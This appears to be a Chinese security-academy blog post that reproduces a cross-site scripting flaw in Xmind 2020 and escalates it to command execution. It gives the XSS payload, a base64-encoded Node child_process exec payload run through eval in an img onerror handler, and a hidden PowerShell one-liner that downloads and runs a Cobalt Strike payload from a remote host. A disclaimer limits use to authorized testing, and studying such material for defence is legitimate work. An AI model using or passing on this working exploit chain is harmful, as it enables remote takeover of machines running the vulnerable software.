扫码领资料
获网安教程
免费&进群
本文由掌控安全学院-xiaoc投稿
零、前言
其实这个漏洞已经爆出来有一些时间了。
为什么今天来炒冷饭呢?
主要是一个小学弟联系我说他复现失败,不弹窗。
难道官方已经修复了?我就去试了试。发现主要是触发方法的问题。
准确的说,学弟并非复现失败,只是没有找到触发的方法。
一、下载
截至到写文章的时候,2021-05-12上午10点官网直接下载的都是存在漏洞的。
下载地址:https://www.xmind.cn/xmind2020/
稍微补充一下,网上又很多的破解版本都是2020版本危害还是可以的。
另外为了防止官方修复版本,将刚刚下载的版本也放到了下边。
二、复现XSS
安装完毕后,随意打开一个思维导图。
payload:
<img src=1 onerror=alert('xxx')>
将poc替换之后,切换到大纲。
鼠标移动到payload最后方,敲空格、ctrl就能触发(经测试任意字符都可以)
此时,在返回思维导图。
三、复现命令执行
第一步,原始的poc
require('child_process').exec('将要执行的系统命令',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
第二步,将要上述代码进行base64编码,如这里执行ipconifg /all
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57ICAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgfSk7
第三步,构建最终的poc
<img src=x onerror='eval(new Buffer(`第二步所有内容`,`base64`).toString())'>
注意的是,第三步的引号没有问题,不要以为是写错了~~~
去测试一下效果,将最终poc复制进去。
同样的原理触发,
四、上线CS
使用powershell上线。
复制得到的exp:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.105:80/a'))"
结合上述第一步的代码,进行base64编码,注意的是:
因为命令行在单引号内,而powershell命令中也有单引号,所以需要用进行转义。
剩下的都一样了,将得到的base64编码粘贴构造成最终poc,复制到思维导图中。
触发方法也是一致,触发后直接上线CS。
五、其他
安装别可以直接去官网下载,也可以直接下载下边的附件。
日常求赞~~~
同学附件无法上传,故学院帮忙上传至百度云盘:
链接:https://pan.baidu.com/s/19TTFIwh43fs0nRqhLbb3vg
提取码:fhhi
复制这段内容后打开百度网盘手机App,操作更方便哦—来自百度网盘超级会员V5的分享
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+交流群+靶场账号哦
分享后扫码加我!
回顾往期内容
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
原文始发于微信公众号(掌控安全EDU):Xmind XSS以及RCE 漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论